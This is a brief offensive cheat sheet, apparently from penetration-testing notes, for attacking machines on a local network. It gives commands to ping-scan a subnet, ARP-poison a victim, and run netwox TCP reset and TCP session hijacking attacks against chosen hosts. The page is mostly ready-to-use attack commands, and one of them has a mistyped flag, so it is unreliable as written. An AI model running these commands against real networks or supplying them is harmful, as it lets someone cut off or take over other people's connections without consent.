Baby Local DoS

Send RST on TCP connections in local network.

Ping scan for active hosts

sudo nmap -sn 192.168.1.0/24
# or with ettercap/bettercap

Perform ARP poisoning on the victim IP.

Use netwag (GUI) or netwox (Command-line)

sudo apt install netwag
sudo apt install netwag-doc
sudo apt install netwox

TCP Reset Attack

netwox 78 -d eth0 -f 'src host <IP>'

TCP Session Hijacking

netwox 40 -l <src_IP> -m <dst_IP> -o <src_PORT> p <dst_PORT> -B -q <SeqNumber>

Last updated